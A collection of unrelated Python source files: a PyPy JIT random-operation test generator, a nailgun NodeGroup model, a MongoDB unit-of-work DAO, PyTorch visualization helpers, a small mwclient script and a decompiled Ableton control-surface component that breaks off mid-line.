p.parent.typeptr = %s_vtable' % (S._name,), file=s) for name, value in fields.items(): print(' p.%s = %d' % (name, value), file=s) writevar(v, 'preb', 'lltype.cast_opaque_ptr(llmemory.GCREF, p)') # ____________________________________________________________ class GuardClassOperation(test_random.GuardOperation): def gen_guard(self, builder, r): ptrvars = [(v, S) for (v, S) in builder.ptrvars if isinstance(S, lltype.Struct) and S._names[0] == 'parent'] if not ptrvars: raise test_random.CannotProduceOperation v, S = r.choice(ptrvars) if r.random() < 0.3: v2, S2 = v, S else: v2, S2 = builder.get_structptr_var(r, must_have_vtable=True) vtable = S._hints['vtable']._as_ptr() vtable2 = S2._hints['vtable']._as_ptr() c_vtable2 = ConstInt(ptr2int(vtable2)) op = ResOperation(self.opnum, [v, c_vtable2], None) return op, (vtable == vtable2) class GuardNonNullClassOperation(GuardClassOperation): def gen_guard(self, builder, r): if r.random() < 0.5: return GuardClassOperation.gen_guard(self, builder, r) else: NULL = lltype.nullptr(llmemory.GCREF.TO) op = ResOperation(rop.SAME_AS_R, [ConstPtr(NULL)]) builder.loop.operations.append(op) v2, S2 = builder.get_structptr_var(r, must_have_vtable=True) vtable2 = S2._hints['vtable']._as_ptr() c_vtable2 = ConstInt(ptr2int(vtable2)) op = ResOperation(self.opnum, [op, c_vtable2], None) return op, False class ZeroPtrFieldOperation(test_random.AbstractOperation): def field_descr(self, builder, r): if getattr(builder.cpu, 'is_llgraph', False): raise test_random.CannotProduceOperation v, S = builder.get_structptr_var(r, ) names = S._names if names[0] == 'parent': names = names[1:] choice = [] for name in names: FIELD = getattr(S, name) if FIELD is lltype.Signed: # xxx should be a gc ptr, but works too choice.append(name) if not choice: raise test_random.CannotProduceOperation name = r.choice(choice) descr = builder.cpu.fielddescrof(S, name) return v, descr.offset def produce_into(self, builder, r): v, offset = self.field_descr(builder, r) builder.do(self.opnum, [v, ConstInt(offset)], None) class GetFieldOperation(test_random.AbstractOperation): def field_descr(self, builder, r): v, S = builder.get_structptr_var(r, ) names = S._names if names[0] == 'parent': names = names[1:] choice = [] kind = optypes[self.opnum] for name in names: FIELD = getattr(S, name) if not isinstance(FIELD, lltype.Ptr): if kind == 'n' or getkind(FIELD)[0] == kind: choice.append(name) if not choice: raise test_random.CannotProduceOperation name = r.choice(choice) descr = builder.cpu.fielddescrof(S, name) descr._random_info = 'cpu.fielddescrof(..., %r)' % (name,) descr._random_type = S TYPE = getattr(S, name) return v, descr, TYPE def produce_into(self, builder, r): while True: try: v, descr, _ = self.field_descr(builder, r) self.put(builder, [v], descr) except lltype.UninitializedMemoryAccess: continue break class GetInteriorFieldOperation(test_random.AbstractOperation): def field_descr(self, builder, r): v, A = builder.get_structptr_var(r, type=lltype.Array, array_of_structs=True) array = getref(lltype.Ptr(A), v) v_index = builder.get_index(len(array), r) choice = [] for name in A.OF._names: FIELD = getattr(A.OF, name) if not isinstance(FIELD, lltype.Ptr): choice.append(name) if not choice: raise test_random.CannotProduceOperation name = r.choice(choice) descr = builder.cpu.interiorfielddescrof(A, name) descr._random_info = 'cpu.interiorfielddescrof(..., %r)' % (name,) descr._random_type = A TYPE = getattr(A.OF, name) return v, v_index, descr, TYPE def produce_into(self, builder, r): while True: try: v, v_index, descr, _ = self.field_descr(builder, r) self.put(builder, [v, v_index], descr) except lltype.UninitializedMemoryAccess: continue break class SetFieldOperation(GetFieldOperation): def produce_into(self, builder, r): v, descr, TYPE = self.field_descr(builder, r) while True: if r.random() < 0.3: w = ConstInt(r.random_integer()) else: w = r.choice(builder.intvars) value = getint(w) if rffi.cast(lltype.Signed, rffi.cast(TYPE, value)) == value: break builder.do(self.opnum, [v, w], descr) class SetInteriorFieldOperation(GetInteriorFieldOperation): def produce_into(self, builder, r): v, v_index, descr, TYPE = self.field_descr(builder, r) while True: if r.random() < 0.3: w = ConstInt(r.random_integer()) else: w = r.choice(builder.intvars) value = getint(w) if rffi.cast(lltype.Signed, rffi.cast(TYPE, value)) == value: break builder.do(self.opnum, [v, v_index, w], descr) class NewOperation(test_random.AbstractOperation): def size_descr(self, builder, S, *vtable): descr = builder.cpu.sizeof(S, *vtable) descr._random_info = 'cpu.sizeof(...)' descr._random_type = S return descr def produce_into(self, builder, r): if self.opnum == rop.NEW_WITH_VTABLE: S, vtable = builder.get_random_structure_type_and_vtable(r) descr = self.size_descr(builder, S, vtable) else: S = builder.get_random_structure_type(r) descr = self.size_descr(builder, S) v_ptr = builder.do(self.opnum, [], descr) builder.ptrvars.append((v_ptr, S)) class ArrayOperation(test_random.AbstractOperation): def array_descr(self, builder, A): descr = builder.cpu.arraydescrof(A) descr._random_info = 'cpu.arraydescrof(...)' descr._random_type = A return descr class GetArrayItemOperation(ArrayOperation): def field_descr(self, builder, r): v, A = builder.get_arrayptr_var(r) array = getref(lltype.Ptr(A), v) v_index = builder.get_index(len(array), r) descr = self.array_descr(builder, A) return v, A, v_index, descr def produce_into(self, builder, r): while True: try: v, _, v_index, descr = self.field_descr(builder, r) self.put(builder, [v, v_index], descr) except lltype.UninitializedMemoryAccess: continue break class SetArrayItemOperation(GetArrayItemOperation): def produce_into(self, builder, r): v, A, v_index, descr = self.field_descr(builder, r) while True: if r.random() < 0.3: w = ConstInt(r.random_integer()) else: w = r.choice(builder.intvars) value = getint(w) if rffi.cast(lltype.Signed, rffi.cast(A.OF, value)) == value: break builder.do(self.opnum, [v, v_index, w], descr) class NewArrayOperation(ArrayOperation): def produce_into(self, builder, r): A = builder.get_random_array_type(r, can_be_array_of_struct=True) v_size = builder.get_index(300, r) v_ptr = builder.do(self.opnum, [v_size], self.array_descr(builder, A)) builder.ptrvars.append((v_ptr, A)) class ArrayLenOperation(ArrayOperation): def produce_into(self, builder, r): v, A = builder.get_arrayptr_var(r) descr = self.array_descr(builder, A) self.put(builder, [v], descr) class _UnicodeOperation: builder_cache = "runicodes" struct = rstr.UNICODE ptr = lltype.Ptr(struct) alloc = staticmethod(rstr.mallocunicode) # XXX This should really be runicode.MAXUNICODE, but then # lltype.cast_primitive complains. max = py.std.sys.maxunicode primitive = lltype.UniChar set_char = rop.UNICODESETITEM class _StrOperation: builder_cache = "rstrs" struct = rstr.STR ptr = lltype.Ptr(struct) alloc = staticmethod(rstr.mallocstr) max = 255 primitive = lltype.Char set_char = rop.STRSETITEM class NewSeqOperation(test_random.AbstractOperation): def produce_into(self, builder, r): v_length = builder.get_index(10, r) v_ptr = builder.do(self.opnum, [v_length]) getattr(builder, self.builder_cache).append(v_ptr) # Initialize the string. Is there a better way to do this? for i in range(getint(v_length)): v_index = ConstInt(i) v_char = ConstInt(r.random_integer() % self.max) builder.do(self.set_char, [v_ptr, v_index, v_char]) class NewStrOperation(NewSeqOperation, _StrOperation): pass class NewUnicodeOperation(NewSeqOperation, _UnicodeOperation): pass class AbstractStringOperation(test_random.AbstractOperation): def get_string(self, builder, r): current = getattr(builder, self.builder_cache) if current and r.random() < .8: v_string = r.choice(current) string = getref(self.ptr, v_string) else: string = self.alloc(getint(builder.get_index(500, r))) v_string = ConstPtr(lltype.cast_opaque_ptr(llmemory.GCREF, string)) current.append(v_string) for i in range(len(string.chars)): char = r.random_integer() % self.max string.chars[i] = lltype.cast_primitive(self.primitive, char) return v_string class AbstractGetItemOperation(AbstractStringOperation): def produce_into(self, builder, r): v_string = self.get_string(builder, r) v_index = builder.get_index(len(getref(self.ptr, v_string).chars), r) builder.do(self.opnum, [v_string, v_index]) class AbstractSetItemOperation(AbstractStringOperation): def produce_into(self, builder, r): v_string = self.get_string(builder, r) if isinstance(v_string, ConstPtr): raise test_random.CannotProduceOperation # setitem(Const, ...) v_index = builder.get_index(len(getref(self.ptr, v_string).chars), r) v_target = ConstInt(r.random_integer() % self.max) builder.do(self.opnum, [v_string, v_index, v_target]) class AbstractStringLenOperation(AbstractStringOperation): def produce_into(self, builder, r): v_string = self.get_string(builder, r) builder.do(self.opnum, [v_string]) class AbstractCopyContentOperation(AbstractStringOperation): def produce_into(self, builder, r): v_srcstring = self.get_string(builder, r) v_dststring = self.get_string(builder, r) src = getref(self.ptr, v_srcstring) dst = getref(self.ptr, v_dststring) if src == dst: # because it's not a raise test_random.CannotProduceOperation # memmove(), but memcpy() srclen = len(src.chars) dstlen = len(dst.chars) v_length = builder.get_index(min(srclen, dstlen), r) v_srcstart = builder.get_index(srclen - getint(v_length) + 1, r) v_dststart = builder.get_index(dstlen - getint(v_length) + 1, r) builder.do(self.opnum, [v_srcstring, v_dststring, v_srcstart, v_dststart, v_length]) class StrGetItemOperation(AbstractGetItemOperation, _StrOperation): pass class UnicodeGetItemOperation(AbstractGetItemOperation, _UnicodeOperation): pass class StrSetItemOperation(AbstractSetItemOperation, _StrOperation): pass class UnicodeSetItemOperation(AbstractSetItemOperation, _UnicodeOperation): pass class StrLenOperation(AbstractStringLenOperation, _StrOperation): pass class UnicodeLenOperation(AbstractStringLenOperation, _UnicodeOperation): pass class CopyStrContentOperation(AbstractCopyContentOperation, _StrOperation): pass class CopyUnicodeContentOperation(AbstractCopyContentOperation, _UnicodeOperation): pass # there are five options in total: # 1. non raising call and guard_no_exception # 2. raising call and guard_exception # 3. raising call and wrong guard_exception # 4. raising call and guard_no_exception # 5. non raising call and guard_exception # (6. test of a cond_call, always non-raising and guard_no_exception) class BaseCallOperation(test_random.AbstractOperation): def non_raising_func_code(self, builder, r): subset = builder.subset_of_intvars(r) funcargs = ", ".join(['arg_%d' % i for i in range(len(subset))]) sum = "intmask(%s)" % " + ".join( ['arg_%d' % i for i in range(len(subset))] + ['42']) if self.opnum == rop.CALL_I: result = 'sum' elif self.opnum == rop.CALL_F: result = 'float(sum)' elif self.opnum == rop.CALL_N: result = '' else: raise AssertionError(self.opnum) code = py.code.Source(""" def f(%s): sum = %s return %s """ % (funcargs, sum, result)).compile() d = {'intmask': intmask} exec(code, d) return subset, d['f'] def raising_func_code(self, builder, r): subset = builder.subset_of_intvars(r) funcargs = ", ".join(['arg_%d' % i for i in range(len(subset))]) S, v = builder.get_structptr_var(r, must_have_vtable=True) code = py.code.Source(""" def f(%s): raise LLException(vtable, ptr) """ % funcargs).compile() vtableptr = v._hints['vtable']._as_ptr() d = { 'ptr': getref_base(S), 'vtable': vtableptr, 'LLException': LLException, } exec(code, d) return subset, d['f'], vtableptr def getresulttype(self): if self.opnum == rop.CALL_I or self.opnum == rop.COND_CALL_VALUE_I: return lltype.Signed elif self.opnum == rop.CALL_F: return lltype.Float elif self.opnum == rop.CALL_N or self.opnum == rop.COND_CALL: return lltype.Void else: raise AssertionError(self.opnum) def getcalldescr(self, builder, TP): assert TP.RESULT == self.getresulttype() ef = EffectInfo.MOST_GENERAL return builder.cpu.calldescrof(TP, TP.ARGS, TP.RESULT, ef) # 1. non raising call and guard_no_exception class CallOperation(BaseCallOperation): def produce_into(self, builder, r): fail_subset = builder.subset_of_intvars(r) subset, f = self.non_raising_func_code(builder, r) RES = self.getresulttype() TP = lltype.FuncType([lltype.Signed] * len(subset), RES) ptr = llhelper(lltype.Ptr(TP), f) c_addr = ConstInt(ptr2int(ptr)) args = [c_addr] + subset descr = self.getcalldescr(builder, TP) self.put(builder, args, descr) op = ResOperation(rop.GUARD_NO_EXCEPTION, [], descr=builder.getfaildescr()) op.setfailargs(fail_subset) builder.loop.operations.append(op) # 5. Non raising-call and GUARD_EXCEPTION class CallOperationException(BaseCallOperation): def produce_into(self, builder, r): subset, f = self.non_raising_func_code(builder, r) RES = self.getresulttype() TP = lltype.FuncType([lltype.Signed] * len(subset), RES) ptr = llhelper(lltype.Ptr(TP), f) c_addr = ConstInt(ptr2int(ptr)) args = [c_addr] + subset descr = self.getcalldescr(builder, TP) self.put(builder, args, descr) _, vtableptr = builder.get_random_structure_type_and_vtable(r) exc_box = ConstInt(ptr2int(vtableptr)) op = ResOperation(rop.GUARD_EXCEPTION, [exc_box], descr=builder.getfaildescr()) op.setfailargs(builder.subset_of_intvars(r)) op._exc_box = None builder.should_fail_by = op builder.guard_op = op builder.loop.operations.append(op) # 2. raising call and guard_exception class RaisingCallOperation(BaseCallOperation): def produce_into(self, builder, r): fail_subset = builder.subset_of_intvars(r) subset, f, exc = self.raising_func_code(builder, r) TP = lltype.FuncType([lltype.Signed] * len(subset), lltype.Void) ptr = llhelper(lltype.Ptr(TP), f) c_addr = ConstInt(ptr2int(ptr)) args = [c_addr] + subset descr = self.getcalldescr(builder, TP) self.put(builder, args, descr) exc_box = ConstInt(ptr2int(exc)) op = ResOperation(rop.GUARD_EXCEPTION, [exc_box], descr=builder.getfaildescr()) op.setfailargs(fail_subset) builder.loop.operations.append(op) # 4. raising call and guard_no_exception class RaisingCallOperationGuardNoException(BaseCallOperation): def produce_into(self, builder, r): subset, f, exc = self.raising_func_code(builder, r) TP = lltype.FuncType([lltype.Signed] * len(subset), lltype.Void) ptr = llhelper(lltype.Ptr(TP), f) c_addr = ConstInt(ptr2int(ptr)) args = [c_addr] + subset descr = self.getcalldescr(builder, TP) self.put(builder, args, descr) op = ResOperation(rop.GUARD_NO_EXCEPTION, [], descr=builder.getfaildescr()) op._exc_box = ConstInt(ptr2int(exc)) op.setfailargs(builder.subset_of_intvars(r)) builder.should_fail_by = op builder.guard_op = op builder.loop.operations.append(op) # 3. raising call and wrong guard_exception class RaisingCallOperationWrongGuardException(BaseCallOperation): def produce_into(self, builder, r): subset, f, exc = self.raising_func_code(builder, r) TP = lltype.FuncType([lltype.Signed] * len(subset), lltype.Void) ptr = llhelper(lltype.Ptr(TP), f) c_addr = ConstInt(ptr2int(ptr)) args = [c_addr] + subset descr = self.getcalldescr(builder, TP) self.put(builder, args, descr) while True: _, vtableptr = builder.get_random_structure_type_and_vtable(r) if vtableptr != exc: break other_box = ConstInt(ptr2int(vtableptr)) op = ResOperation(rop.GUARD_EXCEPTION, [other_box], descr=builder.getfaildescr()) op._exc_box = ConstInt(ptr2int(exc)) op.setfailargs(builder.subset_of_intvars(r)) builder.should_fail_by = op builder.guard_op = op builder.loop.operations.append(op) # 6. a conditional call (for now always with no exception raised) class CondCallOperation(BaseCallOperation): def produce_into(self, builder, r): fail_subset = builder.subset_of_intvars(r) if self.opnum == rop.COND_CALL: RESULT_TYPE = lltype.Void v_cond = builder.get_bool_var(r) else: RESULT_TYPE = lltype.Signed v_cond = r.choice(builder.intvars) subset = builder.subset_of_intvars(r)[:4] for i in range(len(subset)): if r.random() < 0.35: subset[i] = ConstInt(r.random_integer()) # seen = [] def call_me(*args): if len(seen) == 0: seen.append(args) else: assert seen[0] == args if RESULT_TYPE is lltype.Signed: return len(args) - 42000 # TP = lltype.FuncType([lltype.Signed] * len(subset), RESULT_TYPE) ptr = llhelper(lltype.Ptr(TP), call_me) c_addr = ConstInt(ptr2int(ptr)) args = [v_cond, c_addr] + subset descr = self.getcalldescr(builder, TP) self.put(builder, args, descr) op = ResOperation(rop.GUARD_NO_EXCEPTION, [], descr=builder.getfaildescr()) op.setfailargs(fail_subset) builder.loop.operations.append(op) # ____________________________________________________________ OPERATIONS = test_random.OPERATIONS[:] for i in range(4): # make more common OPERATIONS.append(GetFieldOperation(rop.GETFIELD_GC_I)) OPERATIONS.append(GetFieldOperation(rop.GETFIELD_GC_I)) OPERATIONS.append(GetInteriorFieldOperation(rop.GETINTERIORFIELD_GC_I)) OPERATIONS.append(GetInteriorFieldOperation(rop.GETINTERIORFIELD_GC_I)) OPERATIONS.append(SetFieldOperation(rop.SETFIELD_GC)) OPERATIONS.append(SetInteriorFieldOperation(rop.SETINTERIORFIELD_GC)) OPERATIONS.append(NewOperation(rop.NEW)) OPERATIONS.append(NewOperation(rop.NEW_WITH_VTABLE)) OPERATIONS.append(GetArrayItemOperation(rop.GETARRAYITEM_GC_I)) OPERATIONS.append(GetArrayItemOperation(rop.GETARRAYITEM_GC_I)) OPERATIONS.append(SetArrayItemOperation(rop.SETARRAYITEM_GC)) OPERATIONS.append(NewArrayOperation(rop.NEW_ARRAY_CLEAR)) OPERATIONS.append(ArrayLenOperation(rop.ARRAYLEN_GC)) OPERATIONS.append(NewStrOperation(rop.NEWSTR)) OPERATIONS.append(NewUnicodeOperation(rop.NEWUNICODE)) OPERATIONS.append(StrGetItemOperation(rop.STRGETITEM)) OPERATIONS.append(UnicodeGetItemOperation(rop.UNICODEGETITEM)) OPERATIONS.append(StrSetItemOperation(rop.STRSETITEM)) OPERATIONS.append(UnicodeSetItemOperation(rop.UNICODESETITEM)) OPERATIONS.append(StrLenOperation(rop.STRLEN)) OPERATIONS.append(UnicodeLenOperation(rop.UNICODELEN)) OPERATIONS.append(CopyStrContentOperation(rop.COPYSTRCONTENT)) OPERATIONS.append(CopyUnicodeContentOperation(rop.COPYUNICODECONTENT)) for i in range(2): OPERATIONS.append(GuardClassOperation(rop.GUARD_CLASS)) OPERATIONS.append(CondCallOperation(rop.COND_CALL)) OPERATIONS.append(CondCallOperation(rop.COND_CALL_VALUE_I)) OPERATIONS.append(RaisingCallOperation(rop.CALL_N)) OPERATIONS.append(RaisingCallOperationGuardNoException(rop.CALL_N)) OPERATIONS.append(RaisingCallOperationWrongGuardException(rop.CALL_N)) OPERATIONS.append(GuardNonNullClassOperation(rop.GUARD_NONNULL_CLASS)) for _opnum in [rop.CALL_I, rop.CALL_F, rop.CALL_N]: OPERATIONS.append(CallOperation(_opnum)) OPERATIONS.append(CallOperationException(_opnum)) LLtypeOperationBuilder.OPERATIONS = OPERATIONS # ____________________________________________________________ def test_ll_random_function(): test_random.test_random_function(LLtypeOperationBuilder)
# -*- coding: utf-8 -*- # Copyright 2014 Mirantis, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nailgun.objects.serializers.node_group import NodeGroupSerializer from nailgun.db import db from nailgun.db.sqlalchemy.models import NodeGroup as DBNodeGroup from nailgun.errors import errors from nailgun.objects import Cluster from nailgun.objects import NailgunCollection from nailgun.objects import NailgunObject class NodeGroup(NailgunObject): model = DBNodeGroup serializer = NodeGroupSerializer schema = { "$schema": "http://json-schema.org/draft-04/schema#", "title": "NodeGroup", "description": "Serialized NodeGroup object", "type": "object", "properties": { "id": {"type": "number"}, "cluster_id": {"type": "number"}, "name": {"type": "string"} } } @classmethod def create(cls, data): new_group = super(NodeGroup, cls).create(data) try: cluster = Cluster.get_by_uid(new_group.cluster_id) nm = Cluster.get_network_manager(cluster) nst = cluster.network_config.segmentation_type nm.create_network_groups(cluster, nst, gid=new_group.id) nm.create_admin_network_group(new_group.cluster_id, new_group.id) except ( errors.OutOfVLANs, errors.OutOfIPs, errors.NoSuitableCIDR, errors.InvalidNetworkPool ) as exc: db().delete(new_group) raise errors.CannotCreate(exc.message) db().flush() return new_group class NodeGroupCollection(NailgunCollection): single = NodeGroup @classmethod def get_by_cluster_id(cls, cluster_id): if not cluster_id: return cls.filter_by(None, cluster_id=None) return cls.filter_by(None, cluster_id=cluster_id)
import json data = json.dumps({'status': {'recordsTotal': 0, 'request': 'getSalesReport', 'generationTime': 0.13462495803833, 'recordsInResponse': 0, 'requestUnixTime': 1469040297, 'errorCode': 1016, 'errorField': 'dateStart', 'responseStatus': 'error'}, 'records': None})
import mwclient site = mwclient.Site('en.wikipedia.org') def get_gender(users): result = {} users = site.users(users=users, prop=['gender']) for user in users: name = user['name'] if 'missing' in user: result[name] = 'unknown' else: gender = user['gender'] result[name] = gender return result # def get_talk_page(page_id): r = site.pages.get(name='John Monteath Robertson') print(r) # print(get_gender(users=['NRuiz', 'Deacon Vorbis', 'Rick Norwood']))
__author__ = 'Bohdan Mushkevych' from threading import RLock from bson.objectid import ObjectId from pymongo import ASCENDING from pymongo.errors import DuplicateKeyError as MongoDuplicateKeyError from synergy.system import time_helper from synergy.system.time_qualifier import * from synergy.system.decorator import thread_safe from synergy.scheduler.scheduler_constants import COLLECTION_UNIT_OF_WORK, TYPE_MANAGED from synergy.conf import context from synergy.db.error import DuplicateKeyError from synergy.db.model import unit_of_work from synergy.db.model.unit_of_work import UnitOfWork from synergy.db.manager import ds_manager QUERY_GET_FREERUN_SINCE = lambda timeperiod, unprocessed_only: { unit_of_work.TIMEPERIOD: {'$gte': timeperiod}, unit_of_work.UNIT_OF_WORK_TYPE: unit_of_work.TYPE_FREERUN, unit_of_work.STATE: {'$ne': unit_of_work.STATE_PROCESSED if unprocessed_only else None} } class UnitOfWorkDao(object): """ Thread-safe Data Access Object from units_of_work table/collection """ def __init__(self, logger): super(UnitOfWorkDao, self).__init__() self.logger = logger self.lock = RLock() self.ds = ds_manager.ds_factory(logger) @thread_safe def get_one(self, key): """ method finds unit_of_work record and returns it to the caller""" if not isinstance(key, ObjectId): # cast key to ObjectId key = ObjectId(key) query = {'_id': key} collection = self.ds.connection(COLLECTION_UNIT_OF_WORK) document = collection.find_one(query) if document is None: msg = 'Unit_of_work with ID=%s was not found' % str(key) self.logger.warn(msg) raise LookupError(msg) return UnitOfWork.from_json(document) @thread_safe def get_reprocessing_candidates(self, since=None): """ method queries Unit Of Work whose <start_timeperiod> is younger than <since> and who could be candidates for re-processing """ collection = self.ds.connection(COLLECTION_UNIT_OF_WORK) query = {unit_of_work.STATE: {'$in': [unit_of_work.STATE_IN_PROGRESS, unit_of_work.STATE_INVALID, unit_of_work.STATE_REQUESTED]}, unit_of_work.UNIT_OF_WORK_TYPE: TYPE_MANAGED} if since is None: cursor = collection.find(query).sort('_id', ASCENDING) candidates = [UnitOfWork.from_json(document) for document in cursor] else: candidates = [] yearly_timeperiod = time_helper.cast_to_time_qualifier(QUALIFIER_YEARLY, since) query[unit_of_work.START_TIMEPERIOD] = {'$gte': yearly_timeperiod} cursor = collection.find(query).sort('_id', ASCENDING) for document in cursor: uow = UnitOfWork.from_json(document) if uow.process_name not in context.process_context: # this is a decommissioned process continue time_qualifier = context.process_context[uow.process_name].time_qualifier if time_qualifier == QUALIFIER_REAL_TIME: time_qualifier = QUALIFIER_HOURLY process_specific_since = time_helper.cast_to_time_qualifier(time_qualifier, since) if process_specific_since <= uow.start_timeperiod: candidates.append(uow) if len(candidates) == 0: raise LookupError('MongoDB has no reprocessing candidates units of work') return candidates @thread_safe def get_by_params(self, process_name, timeperiod, start_obj_id, end_obj_id): """ method finds unit_of_work record and returns it to the caller""" query = {unit_of_work.PROCESS_NAME: process_name, unit_of_work.TIMEPERIOD: timeperiod, unit_of_work.START_OBJ_ID: start_obj_id, unit_of_work.END_OBJ_ID: end_obj_id} collection = self.ds.connection(COLLECTION_UNIT_OF_WORK) document = collection.find_one(query) if document is None: raise LookupError('Unit_of_work satisfying query %r was not found' % query) return UnitOfWork.from_json(document) @thread_safe def update(self, instance): """ method finds unit_of_work record and change its status""" assert isinstance(instance, UnitOfWork) collection = self.ds.connection(COLLECTION_UNIT_OF_WORK) document = instance.document if instance.db_id: document['_id'] = ObjectId(instance.db_id) instance.db_id = collection.save(document, safe=True) return instance.db_id @thread_safe def insert(self, instance): """ inserts a unit of work into MongoDB. :raises DuplicateKeyError: if such record already exist """ assert isinstance(instance, UnitOfWork) collection = self.ds.connection(COLLECTION_UNIT_OF_WORK) try: return collection.insert(instance.document, safe=True) except MongoDuplicateKeyError as e: exc = DuplicateKeyError(instance.process_name, instance.start_timeperiod, instance.start_id, instance.end_id, e) raise exc @thread_safe def remove(self, uow_id): assert isinstance(uow_id, (str, ObjectId)) collection = self.ds.connection(COLLECTION_UNIT_OF_WORK) return collection.remove(uow_id, safe=True) @thread_safe def run_query(self, query): """ method runs the query and returns a list of filtered UnitOfWork records """ cursor = self.ds.filter(COLLECTION_UNIT_OF_WORK, query) return [UnitOfWork.from_json(document) for document in cursor] def recover_from_duplicatekeyerror(self, e): """ method tries to recover from DuplicateKeyError """ if isinstance(e, DuplicateKeyError): try: return self.get_by_params(e.process_name, e.timeperiod, e.start_id, e.end_id) except LookupError as e: self.logger.error('Unable to recover from DuplicateKeyError error due to %s' % e.message, exc_info=True) else: msg = 'Unable to recover from DuplicateKeyError due to unspecified unit_of_work primary key' self.logger.error(msg)
import math from math import sqrt from os import listdir from os.path import join, basename import matplotlib.pyplot as plt import moviepy.editor as mpy import numpy as np from torch import nn from src.Common import config from src.Common.utils import get_data_base def loss_visualization(training_space: dict, loss_history: dict, i_epoch: int, max_ticks: int = 15) -> None: loss_history_len = len(loss_history['loss']) per_epoch = loss_history_len // i_epoch - 1 x_ticks = np.arange(0, loss_history_len - per_epoch, per_epoch + 1) x_labels = np.array([str(ep) for ep in np.arange(1, i_epoch + 1)]) fig, ax = plt.subplots(figsize=(19.2, 10.8)) ax.plot(np.arange(loss_history_len - per_epoch)[per_epoch:], loss_history['loss'][per_epoch:-per_epoch], color='lavender') ax.plot(x_ticks, loss_history['valid_loss'], label='Validation loss', color='springgreen') ax.plot(x_ticks, loss_history['avg_loss'], label='Train loss', color='royalblue') if len(x_ticks) > max_ticks: mask = np.linspace(start=0, stop=len(x_ticks) - 1, num=15, dtype=np.int32) x_ticks = x_ticks[mask] x_labels = x_labels[mask] ax.set_title(f'Loss changing') ax.set_ylabel('Loss') ax.set_xlabel('Epoch') ax.set_xticks(x_ticks) ax.set_xticklabels(x_labels) ax.set_ybound(lower=0) ax.legend() fig.tight_layout() plt.savefig(join(training_space['loss'], f'{training_space["mark"]}__epoch_{i_epoch}.png'), dpi='figure', format='png', bbox_inches='tight') plt.clf() plt.close('all') def save_parameters(model: nn.Module, training_space: dict, i_epoch: int) -> None: model.save_parameters(filename=join(training_space['parameters'], f'{training_space["mark"]}__epoch_{i_epoch}')) def array_to_image(array: np.ndarray) -> np.ndarray: array = array.reshape(-1) array_size = len(array) image_size = math.ceil(sqrt(array_size)) image = np.zeros(image_size * image_size) image[:array_size] = array # use custom params for other color scheme image -= image.mean() image /= (image.std() + 1e-5) image *= 0.1 image += 0.5 image = np.clip(image, 0, 1) image *= 255 image = np.clip(image, 0, 255).astype('uint8') return image.reshape((image_size, image_size)) def create_image(array: np.ndarray, name: str) -> None: plt.figure(figsize=(20, 20)) plt.tight_layout() plt.imshow(array) plt.savefig(join(config.visualization_path, f'{name}.png'), dpi=600, format='png', bbox_inches='tight') plt.clf() plt.close('all') def create_gif(images_path: str, gif_name: str = 'latent_space', fps: int = 8) -> None: def by_len(s: str): s = basename(s) s = s.split('_')[2] s = s.split('.')[0] return int(s) file_list = [join(images_path, file_name) for file_name in listdir(images_path)] file_list = sorted(file_list, key=by_len) clip = mpy.ImageSequenceClip(file_list, fps=fps) clip.write_gif(join(images_path, f'{gif_name}.gif'), fps=fps) if __name__ == '__main__': data_base = get_data_base('database.csv', labels=False) arr = array_to_image(data_base.loc[0].copy().to_numpy()) create_image(arr, name='image_0') pass
# uncompyle6 version 3.3.5 # Python bytecode 2.7 (62211) # Decompiled from: Python 3.7.3 (default, Apr 24 2019, 15:29:51) [MSC v.1915 64 bit (AMD64)] # Embedded file name: c:\Jenkins\live\output\win_64_static\Release\python-bundle\MIDI Remote Scripts\pushbase\value_component.py # Compiled at: 2018-11-30 15:48:12 from __future__ import absolute_import, print_function, unicode_literals from ableton.v2.base import listenable_property, listens from ableton.v2.control_surface import Component, ParameterSlot from ableton.v2.control_surface.control import EncoderControl, ButtonControl from ableton.v2.control_surface.elements import DisplayDataSource from . import consts from .device_parameter_component import convert_parameter_value_to_graphic NUM_SEGMENTS = 4 def convert_value_to_graphic(value): index = int(value * (len(consts.GRAPH_VOL) - 1)) if index is not None and index < len(consts.GRAPH_VOL): graphic_display_string = consts.GRAPH_VOL[index] else: graphic_display_string = b' ' return graphic_display_string class ValueDisplayComponentBase(Component): def __init__(self, display_label=b' ', display_seg_start=0, *a, **k): super(ValueDisplayComponentBase, self).__init__(*a, **k) self._label_data_source = DisplayDataSource(display_label) self._value_data_source = DisplayDataSource() self._graphic_data_source = DisplayDataSource() self._display_label = display_label self._display_seg_start = display_seg_start def get_value_string(self): raise NotImplementedError def get_graphic_string(self): raise NotImplementedError @listenable_property def value_string(self): return self.get_value_string() def set_label_display(self, display): self._set_display(display, self._label_data_source) def set_value_display(self, display): self._set_display(display, self._value_data_source) def set_graphic_display(self, display): self._set_display(display, self._graphic_data_source) def _set_display(self, display, source): if display: display.set_data_sources((None, ) * NUM_SEGMENTS) display.segment(self._display_seg_start).set_data_source(source) return def update(self): super(ValueDisplayComponentBase, self).update() if self.is_enabled(): self._value_data_source.set_display_string(self.get_value_string()) self._graphic_data_source.set_display_string(self.get_graphic_string()) class ValueComponentBase(Component): """ Component to control one continuous property with a infinite touch-sensitive encoder. You can optionally give it a display and a button such that the value will be displayed while its pressed. """ def create_display_component(self, *a, **k): raise NotImplementedError def __init__(self, display_label=b' ', display_seg_start=0, encoder_touch_delay=0, *a, **k): super(ValueComponentBase, self).__init__(*a, **k) encoder = EncoderControl(touch_event_delay=encoder_touch_delay) encoder.touched = ValueComponentBase.__on_encoder_touched encoder.released = ValueComponentBase.__on_encoder_released encoder.value = ValueComponentBase.__on_encoder_value self.add_control(b'encoder', encoder) self._display = self.create_display_component(display_label=display_label, display_seg_start=display_seg_start) self._display.set_enabled(False) @property def display(self): return self._display def __on_encoder_touched(self, encoder): self._update_display_state() def __on_encoder_released(self, encoder): self._update_display_state() def __on_encoder_value(self, value, encoder): self._on_value(value) def _on_value(self, value): pass def _update_display_state(self): self._display.set_enabled(self.encoder.is_touched) class ValueDisplayComponent(ValueDisplayComponentBase): """ Display for values from standard Python properties. """ def __init__(self, property_name=None, subject=None, display_format=b'%f', view_transform=None, graphic_transform=None, *a, **k): super(ValueDisplayComponent, self).__init__(*a, **k) self._subject = subject self._property_name = 